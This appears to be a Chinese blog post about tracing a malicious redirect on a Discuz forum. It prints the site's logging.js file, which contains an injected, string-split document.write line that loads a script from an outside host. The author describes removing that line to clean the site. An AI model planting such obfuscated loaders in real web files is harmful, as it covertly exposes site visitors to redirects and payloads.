最近，有一朋友的discuz系統(tǒng)網(wǎng)站被掛馬了，一打開網(wǎng)站主頁兩秒鐘之后就跳轉(zhuǎn)到了游戲網(wǎng)站。這樣的情況往往是在每天第一次打開網(wǎng)站的時(shí)候出現(xiàn)的，一天只有偶爾的一兩次。朋友求我相助，經(jīng)過一番周折，終于找到了掛馬的地方。

　　剛開始，用discuz后臺自帶的“文件校驗(yàn)”功能去查找是否有修改的文件和未知文件，結(jié)果沒有發(fā)現(xiàn)可疑目標(biāo)。然后用了360網(wǎng)站安全檢測和安全聯(lián)盟安全檢測進(jìn)行查找掃描有無掛馬情況，最后還是無功而返。無賴之下，只好進(jìn)行逐一排查了，問題終于發(fā)現(xiàn)了，原來這次是在js文件里掛了馬。

　　我先排查了iframe框架情況，結(jié)果沒有發(fā)現(xiàn)情況。然后檢查js文件，先檢查主頁里面的js文件，在檢查logging.js這個(gè)文件時(shí)，問題發(fā)現(xiàn)了。

　　logging.js這個(gè)文件的路勁是/static/js/logging.js ，它本來是個(gè)登陸狀態(tài)判斷文件。我們先看看這段代碼：

/*

[Discuz!] (C)2001-2099 Comsenz Inc.

This is NOT a freeware, use is subject to license terms

$Id: logging.js 23838 2011-08-11 06:51:58Z monkey $

*/

function lsSubmit(op) {

var op = !op ? 0 : op;

if(op) {

$('lsform').cookietime.value = 2592000;

}

if($('ls_username').value == '' || $('ls_password').value == '') {

showWindow('login', 'member.php?mod=logging&action=login' + (op ? '&cookietime=1' : ''));

} else {

ajaxpost('lsform', 'return_ls', 'return_ls');

}

return false;

}

document.write("<scr"+"ipt src="'http://q."+"n1512"

+"2"+".com"+"/s."+"asp"+"?gansu.lanzhou'>");

function errorhandle_ls(str, param) {

if(!param['type']) {

showError(str);

}

}

　　結(jié)果出現(xiàn)紅色字體的多余代碼，當(dāng)機(jī)立斷刪除了這段代碼。網(wǎng)站回復(fù)了正常！